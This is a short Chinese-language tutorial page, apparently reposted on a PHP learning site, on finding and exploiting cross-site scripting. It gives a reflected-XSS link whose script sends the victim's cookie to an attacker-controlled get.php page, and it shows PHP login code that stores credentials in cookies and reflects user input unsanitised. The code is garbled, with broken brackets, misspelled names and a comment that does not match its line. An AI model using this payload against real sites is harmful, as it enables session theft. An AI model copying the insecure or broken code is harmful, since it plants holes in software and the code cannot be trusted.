好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

浅谈xss的挖掘和利用 - 网站安全 - 自学php

 马上我的论坛就要开放了,有点小激动!!,废话不多说了,看下文吧!!  背景:XSS也是老生长谈的话题了,其危害性呢,大家都懂的,刚看到几个黑阔的反射型和储存型的争论,恰好小白的我觉得呢,浅谈一下XSS的挖掘和利用,有利于学习的氛围 !   XSS: Cross Site Spripting –  -  一般的攻击步骤:   1我们一般喜欢发送隐藏网站脚本的HTTP链接给目标:http://www.2cto.com /post.php?user=<script>document.location=]http://www.2cto.com /get.php?cookie=]+document.cookie;</script>  1  2:目标用户打开有xss 漏洞 的网站在登录期间打开了我们发送的隐藏跨站脚本的HTTP链接.   3:有xss的90se呢执行了这个http链接并且显示url参数user的值,这样跨站脚本就执行了.   4:跨站脚本将目标用户的 浏览器 地址专一到了我们的页面:http://www.2cto.com /get.php,目标用户浏览器的cookie数据被当作get.php网页的url参数cookie:http://www.2cto.com /get.php?cokie=document.cookie,从而让我们得到目标的cookie   简单挖掘:看下面代码  if($match_count)  { setcookie([uername],$_POST["username"],time()+30*24*60*60) //将username字段的值存入cookie  setcookie([uername],$_POST["username"],time()+30*24*60*60) //将password字段的值存入cookie   mysql _free_result($result);  mysql_close($link);  // 跳转页面  header([Location:http//localhost/balck/black.php?user=]  $_POST["username"])//在使用者登陆后,将当前页面跳转到black.php,back.php文件有url参数user,user值是来访者的帐号  }  else  {   header([Location:http:// .$_SERVER["HTTP_HOST"][  $_SERVER["SCRIPT_NAME"]); 来自:90 sacret Team信息安全团队

查看更多关于浅谈xss的挖掘和利用 - 网站安全 - 自学php的详细内容...

  阅读:35次